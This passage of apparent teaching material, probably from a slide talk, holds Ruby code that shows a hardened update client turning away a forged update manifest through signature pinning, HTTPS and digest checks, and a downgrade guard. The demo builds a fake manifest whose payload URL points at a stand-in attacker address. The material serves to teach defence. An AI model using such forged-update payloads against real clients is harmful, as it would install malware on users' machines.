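def sign_manifest(manifest_json, private_key)
  [private_key.sign(OpenSSL::Digest.new('SHA256'), manifest_json)].pack('m0')
end

# Hardened client: pinned vendor key, HTTPS-only download, well-formed digest,
# and no downgrade below the installed version.
def hardened_client_accepts?(manifest_json, signature_b64, pinned_public_key, current_version)
  sig = signature_b64.unpack1('m')
  return false unless pinned_public_key.verify(OpenSSL::Digest.new('SHA256'), sig, manifest_json)
  m = JSON.parse(manifest_json)
  return false unless m['url'].to_s.start_with?('https://')
  return false unless m['sha256'].to_s.match?(/\A[0-9a-f]{64}\z/)
  newer_version?(m['version'].to_s, current_version)
rescue OpenSSL::PKey::PKeyError, JSON::ParserError
  false
end

# Dotted numeric version compare; true only when candidate is strictly newer.
def newer_version?(candidate, current)
  (candidate.split('.').map(&:to_i) <=> current.split('.').map(&:to_i)) == 1
end

# Constructed keys and manifests for the demonstration. The attacker has a key too,
# but not the one pinned in the client.
VENDOR_KEY   = OpenSSL::PKey::RSA.new(2048)
ATTACKER_KEY = OpenSSL::PKey::RSA.new(2048)
GENUINE = update_manifest(version: '2.1.0', url: 'https://updates.example.test/app-2.1.0.exe',
                          sha256: OpenSSL::Digest::SHA256.hexdigest('genuine installer bytes'),
                          description: 'Bug fixes')
GENUINE_SIG = sign_manifest(GENUINE, VENDOR_KEY)
EVIL = fake_update_manifest(payload_url: 'http://192.0.2.1/payload.exe')

if __FILE__ == $PROGRAM_NAME
  puts "weak client installs the fake update:     #{weak_client_accepts?(EVIL)}"
  puts "hardened client installs the fake update: " \
       "#{hardened_client_accepts?(EVIL, sign_manifest(EVIL, ATTACKER_KEY), VENDOR_KEY.public_key, '2.0.0')}"
end
```

Note that the hardened client also rejects a genuine, correctly signed manifest that is replayed against a newer installation: an attacker who can only replay old vendor responses must not be able to roll the victim back to a version with known holes.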
  • 43. That's it! Q & A